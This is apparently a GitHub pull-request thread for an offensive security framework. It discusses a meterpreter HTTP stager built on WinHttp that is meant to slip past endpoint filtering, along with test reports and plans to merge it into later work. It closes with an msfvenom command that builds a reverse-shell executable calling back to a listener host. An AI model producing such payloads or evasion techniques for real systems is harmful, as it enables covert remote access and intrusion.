-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
HTTP stager based on WinHttp #4608
Conversation
Ops! need to update spec/modules/payloads_spec.rb ... |
@BorjaMerino when you say useful for bypassing filtering do you mean recognition of the payload itself, or that somehow WinHTTP actually helps you bypass filtering of the traffic? |
@dmaloney-r7 I did not explain myself very well, sorry. I mean that the payload could be useful |
WinInet is filtered by endpoint protection products as well (where WinHTTP may not be). |
@BorjaMerino the staging is part of it, but we would need to implement a WinHTTP transport for meterpreter for that test case to be valid (in the example above, the stager is using WinHTTP but the payload is using WinInet). |
@hmoore-r7 yes, of course. I did not find any stage working with WinHTTP so I use meterpreter just to show that the stager works. In the meantime, the stager could be useful if someone has its own reflectiveDLL/stage using WinHTTP . |
@BorjaMerino the stager works well on windows 7, but crashes on XP |
@dmaloney-r7 thank you for testing. Could you give me more info about the crash. If I remember well I also checked it in XP SP3 |
@BorjaMerino NO! you must suffer my terrible bug report and try to glean some meaning from it! =) Sorry, tested on Windows XP SP0 , English |
XP SP0, dear god, nothing works on that ;)
|
@kernelsmith aside from all of our other stagers and payloads you mean? |
@dmaloney-r7 xDDDD I will try it with a SP0. Thank you :) |
no, not what I meant.
|
@dmaloney-r7 sorry for the delay :p. With version 5.1, WinHTTP is an operating-system component of the following operating systems: |
Grabbing this one because it lines up with some other planned work. We have too many HTTP stagers right now and I plan to consolidate these into newer "complex" payloads that are runtime configurable. This PR is a great start on WinHTTP support, but doesn't support SSL, nor the other use cases (proxy, proxy pstore, etc). It would make more sense to combine this into a bigger effort. |
Marking delayed since this is part of #4895 |
@BorjaMerino I am using this PR as a base for WinHTTP stagers. You can follow the development on my branch. Thank you for your work on this, I will close out this PR once the new one is ready for testing. |
@hmoore-r7 you are super welcome :) |
Putting this on hold until #4904 is merged, since I plan to reuse the blockapi/exitfunk code from that changeset. |
Replaced by #4914 |
This is an adaptation from the @hmoore-r7 stager (based on WinINET) to WinHTTP; useful to bypass a lot of filtering.
I will create another PR for the HTTPS version since I'm getting some errors I have to solve first.
Tested in Win 7 32/64
EJ:
./msfvenom -p windows/meterpreter/reverse_winhttp_http LHOST=192.168.1.34 LPORT=8080 -f exe >winhttp8080.exe